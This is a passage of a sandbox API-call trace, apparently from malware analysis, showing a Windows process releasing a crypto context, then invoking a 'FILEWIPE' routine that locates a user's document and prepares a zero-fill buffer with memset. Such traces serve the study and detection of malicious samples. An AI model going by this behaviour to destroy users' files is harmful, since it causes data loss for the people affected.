wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.615] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0177.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0177.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.615] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.615] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0177.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0177.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.615] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0177.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0177.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0177.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0177.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0177.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0177.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0177.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0177.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0177.616] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0177.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0177.616] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.616] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0177.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.616] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0177.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0177.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0177.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0177.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.616] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.616] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0177.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.617] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0177.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0177.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0177.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0177.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.617] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0177.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0177.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.617] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0177.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0177.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0177.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0177.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.617] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0177.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0177.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0177.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0177.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0177.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0177.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x90d440, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0177.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.618] GetProcAddress (hModule=0x74f20000, lpProcName="CryptReleaseContext") returned 0x74f2e124 [0177.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0177.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0177.618] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0177.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0177.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0177.619] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.619] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.619] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0177.620] FreeLibrary (hLibModule=0x74f20000) returned 1 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0177.620] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0177.620] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0177.620] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0177.620] CloseHandle (hObject=0x138) returned 1 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0177.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0177.621] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0177.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0177.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.621] CloseHandle (hObject=0x120) returned 1 [0177.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0177.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0177.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0177.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0177.624] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.627] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.627] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0177.627] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.628] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.628] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.ots", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d7e0f10, ftCreationTime.dwHighDateTime=0x1d5e5c6, ftLastAccessTime.dwLowDateTime=0xf64cede0, ftLastAccessTime.dwHighDateTime=0x1d5e360, ftLastWriteTime.dwLowDateTime=0xf64cede0, ftLastWriteTime.dwHighDateTime=0x1d5e360, nFileSizeHigh=0x0, nFileSizeLow=0x17fea, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="B1Y6naM2jHwq3MoZolB.ots", cAlternateFileName="B1Y6NA~1.OTS")) returned 0x90af58 [0177.629] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0177.629] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.629] CharLowerBuffW (in: lpsz="byte[98282]", cchLength=0xb | out: lpsz="byte[98282]") returned 0xb [0177.631] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.631] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0177.631] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.631] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0177.631] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0177.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0177.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0177.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0177.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c26c8 [0177.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c26c8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0177.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0177.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0177.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0177.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0177.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0177.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0177.632] FreeLibrary (hLibModule=0x75c90000) returned 1 [0177.632] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0177.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0177.632] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 